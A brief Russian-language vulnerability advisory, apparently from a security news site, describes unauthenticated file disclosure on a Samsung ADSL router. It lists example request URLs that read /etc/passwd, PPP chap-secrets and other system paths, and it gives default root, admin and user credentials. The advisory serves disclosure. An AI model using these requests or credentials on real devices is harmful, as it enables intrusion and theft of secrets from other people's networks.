Программа: Samsung ADSL Router

Уязвимость позволяет удаленному
пользователю просмотреть произвольные
файлы на устройстве и получить
административный доступ к учетным записям
по умолчанию. Удаленный пользователь может
с помощью HTTP GET запроса получить
неавторизованный доступ к произвольным
файлам на устройстве.

Пример:

http://[target]/etc/passwd
ht tp://[target]/etc/hosts
http://[target]/bin/
http://[target]/dev/
http://[target]/lib/
http://[target]/tmp/
http://[target]/var/ppp/chap-secrets
http://[target]/bin /sh

Устройство использует несколько учетных
записей ('root', 'admin', и 'user'), где по умолчанию
пароль равен имени учетной записи.

Подписаться
Уведомить о
0 комментариев
Межтекстовые Отзывы
Посмотреть все комментарии